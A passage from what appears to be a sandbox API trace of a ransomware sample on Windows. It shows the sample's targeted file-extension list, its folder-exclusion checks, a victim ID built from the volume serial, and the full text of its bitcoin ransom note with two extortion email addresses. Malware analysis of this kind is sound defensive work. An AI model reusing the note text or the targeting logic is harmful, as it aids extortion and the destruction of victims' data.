lc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dll") returned 0x0
	[0170.210] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="temp", cAlternateFileName="")) returned 1
	[0170.210] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="temp", cAlternateFileName="")) returned 0
	[0170.211] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.211] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.211] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production"
	[0170.211] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*"
	[0170.212] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.212] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.212] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\HELP_DECRYPT_YOUR_FILES.TXT") returned 79
	[0170.212] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.218] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0170.218] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.222] CloseHandle (hObject=0x388) returned 1
	[0170.222] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.223] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.223] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0170.224] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.224] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.225] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.225] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.225] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0170.225] CloseHandle (hObject=0x388) returned 1
	[0170.226] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.226] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.226] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.226] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\HELP_DECRYPT_YOUR_FILES.HTML") returned 80
	[0170.227] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.227] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.227] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0170.234] CloseHandle (hObject=0x388) returned 1
	[0170.236] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.237] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.237] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.237] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0170.239] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.239] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.239] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.240] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.240] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0170.240] CloseHandle (hObject=0x388) returned 1
	[0170.241] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x7efd2f1b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.241] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*") returned 55
	[0170.241] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.241] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*") returned 0x37
	[0170.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="windows") returned 0x0
	[0170.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="boot") returned 0x0
	[0170.242] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.242] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="system volume information") returned 0x0
	[0170.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.243] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="temp") returned 0x0
	[0170.243] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.244] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="program files") returned 0x0
	[0170.244] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="appdata") returned 0x0
	[0170.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.245] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="application data") returned 0x0
	[0170.245] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="winnt") returned 0x0
	[0170.246] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="tmp") returned 0x0
	[0170.246] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.246] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="cache") returned 0x0
	[0170.246] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="webcache") returned 0x0
	[0170.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="inetcache") returned 0x0
	[0170.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.247] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="nvidia") returned 0x0
	[0170.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="packages") returned 0x0
	[0170.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="cookies") returned 0x0
	[0170.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.248] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="programdata") returned 0x0
	[0170.249] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0170.249] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0170.249] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x7efd2f1b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.249] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0170.249] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7efd2f1b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7efd2f1b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7eff91e3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0170.249] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7efd2f1b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7efd2f1b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7efd2f1b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0170.249] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9940c797, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x6988, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1
	[0170.249] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="temp", cAlternateFileName="")) returned 1
	[0170.249] lstrcmpW (lpString1="temp", lpString2="..") returned 1
	[0170.250] lstrcmpW (lpString1="temp", lpString2=".") returned 1
	[0170.250] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production"
	[0170.250] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\"
	[0170.250] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\", lpString2="temp" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp"
	[0170.250] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp"
	[0170.250] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\"
	[0170.250] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\"
	[0170.251] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*"
	[0170.251] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b9d2ab4, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0170.258] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*") returned 60
	[0170.258] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.259] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*", cchLength=0x3c | out: lpsz="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*") returned 0x3c
	[0170.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.260] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*", lpSrch="windows") returned 0x0
	[0170.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.261] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*", lpSrch="boot") returned 0x0
	[0170.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.261] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*", lpSrch="system volume information") returned 0x0
	[0170.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.261] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.262] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\*.*", lpSrch="temp") returned="temp\\*.*"
	[0170.262] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0170.262] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp"
	[0170.262] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*"
	[0170.262] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.263] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.263] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\HELP_DECRYPT_YOUR_FILES.TXT") returned 84
	[0170.263] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\temp\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
